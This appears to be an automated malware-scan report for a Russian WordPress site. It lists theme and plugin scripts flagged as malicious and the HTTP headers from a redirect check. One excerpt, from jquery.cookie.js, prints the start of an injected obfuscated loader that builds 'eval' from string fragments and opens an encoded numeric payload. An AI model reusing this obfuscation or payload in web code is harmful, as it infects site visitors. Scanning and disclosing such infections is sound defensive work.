Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elite-catalogue.ru
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://elite-catalogue.ru/ | 200 OK Content-Length: 53915 Content-Type: text/html | clean |
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/jquery-1.3.1.min.js | 200 OK Content-Length: 58704 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt shows only the start of the file, which reads as ordinary minified jQuery code; the flagged content is presumably further into the file. Excerpt (truncated): (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/jquery-custom.js | 200 OK Content-Length: 6442 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $('a#options').click(function (){ if (($('.layout_options')).is(':hidden')) { $('#wrapper').fadeTo('fast', 0.33); $('.layout_options').fadeIn('normal'); } else { $('#wrapper').fadeTo('fast', 1.0); $('.layout_options').fadeOut('normal'); } }); $('a#reset').click(function() { $('.cat-widget').each( function() {$.cookie($(this).attr('id'), null, { path: '/', expires: 100 }); $(this).show()}); $('.box_a').each( fun Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/tabs.js | 200 OK Content-Length: 12326 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function ddtabcontent(tabinterfaceid){ this.tabinterfaceid=tabinterfaceid this.tabs=document.getElementById(tabinterfaceid).getElementsByTagName("a") this.enabletabpersistence=true this.hottabspositions=[] this.currentTabIndex=0 this.subcontentids=[] this.revcontentids=[] this.selectedClassTarget="link" } ddtabcontent.getCookie=function(Name){ var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] retu Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/clear-input.js | 200 OK Content-Length: 4204 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function clearInput (cssClass) { var focusField = $(cssClass); focusField.focus( function(){ var el = $(this); var val = el.val(); if (!el.data('placeholder')) { el.data('placeholder', val); } if(val === el.data('placeholder')) { el.val(''); } }); focusField.blur( function () { var el = $(this); if (el.val() === '') { el.val(el.data('placeholder') || ''); } });< Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/themes/wp-comfy/scripts/jquery.cookie.js | 200 OK Content-Length: 3456 Content-Type: application/x-javascript | malicious |
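Malicious code - confirmed by antiviruses (see below). Unlike the other flagged files, this excerpt opens with obfuscated script rather than the cookie plugin's own code: it assembles the name "eval" from string fragments ("e" + "va" + "l") and looks it up on window, then defines a "&&"-delimited list of numbers that is presumably an encoded payload. Excerpt (truncated): v="va"+"l";try{ebgserb++;}catch(snregrx){try{(Math+"")()}catch(ztbet){m=Math;ev=window[""+"e"+v];}n="56&&119&&133&&127&&115&&133&&121&&128&&126&&57&&57&&49&&139&&30&&26&&26&&134&&114&&130&&49&&133&&131&&124&&49&&77&&49&&55&&121&&132&&133&&128&&75 Antivirus reports: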
| ||
http://elite-catalogue.ru/wp-includes/js/jquery/jquery.js?ver=1.3.2 | 200 OK Content-Length: 57278 Content-Type: application/x-javascript | clean |
http://elite-catalogue.ru/wp-content/themes/wp-comfy/javascript/date.js | 200 OK Content-Length: 4072 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var mydate=new Date() var year=mydate.getYear() if (year < 1000) year+=1900 var day=mydate.getDay() var month=mydate.getMonth() var daym=mydate.getDate() if (daym<10) daym="0"+daym var dayarray=new Array("воскресенье","понедельник","вторник","среда","четверг","пятница","суббота") var montharray=new Array("января","февраля","марта","апреля","мая","июня","июля","а Antivirus reports:
| ||
http://autocontext.begun.ru/autocontext2.js | 200 OK Content-Length: 249 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19468 Content-Type: text/javascript | clean |
http://counter.rambler.ru/top100.jcn?1818835 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://elite-catalogue.ru/wp-content/plugins/shutter-reloaded/shutter-reloaded.js?ver=2.4 | 200 OK Content-Length: 11499 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var shutterLinks={},shutterSets={};function shutterAddLoad(a){if("undefined"!=typeof jQuery){jQuery(document).ready(a())}else{if(typeof window.onload!="function"){window.onload=a}else{oldonld=window.onload;window.onload=function(){if(oldonld){oldonld()}a()}}}}shutterReloaded={I:function(b){return document.getElementById(b)},settings:function(){var a=this,b=shutterSettings;a.L10n=b.L10n||["Previous","Next","Close","Full Size","Fit to Screen","Image","of","Loading..."];a.imageCount=b.imageCount||0 Antivirus reports:
| ||
http://elite-catalogue.ru/wp-content/plugins/wp-postratings/postratings-js.js?ver=1.50 | 404 Not Found Content-Length: 140047 Content-Type: text/html | clean |
http://elite-catalogue.ru/wp-content/plugins/wp-postratings/ | 403 Forbidden Content-Length: 508 Content-Type: text/html | clean |
http://elite-catalogue.ru/test404page.js | 404 Not Found Content-Length: 140001 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elite-catalogue.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 Jan 2015 03:04:25 GMT
Pragma: no-cache
Server: nginx/1.0.12
Vary: Accept-Encoding
Vary: Cookie,Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=aec740103188c44da3d232a8b10220e0; path=/
X-Pingback: http://elite-catalogue.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17
X-XRDS-Location: http://elite-catalogue.ru/?xrds
X-Yadis-Location: http://elite-catalogue.ru/?xrds
GET / HTTP/1.1
Host: elite-catalogue.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 Jan 2015 03:04:25 GMT
Pragma: no-cache
Server: nginx/1.0.12
Vary: Accept-Encoding
Vary: Cookie,Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=aec740103188c44da3d232a8b10220e0; path=/
X-Pingback: http://elite-catalogue.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17
X-XRDS-Location: http://elite-catalogue.ru/?xrds
X-Yadis-Location: http://elite-catalogue.ru/?xrds
Second query (visit from search engine):
GET / HTTP/1.1
Host: elite-catalogue.ru
Referer: http://www.google.com/search?q=elite-catalogue.ru
Result:
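The result is similar to the first query. No suspicious redirects were found. Only the Referer header differs between the two queries, so this check does not rule out redirects conditioned on other request properties such as User-Agent or cookies.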
GET / HTTP/1.1
Host: elite-catalogue.ru
Referer: http://www.google.com/search?q=elite-catalogue.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.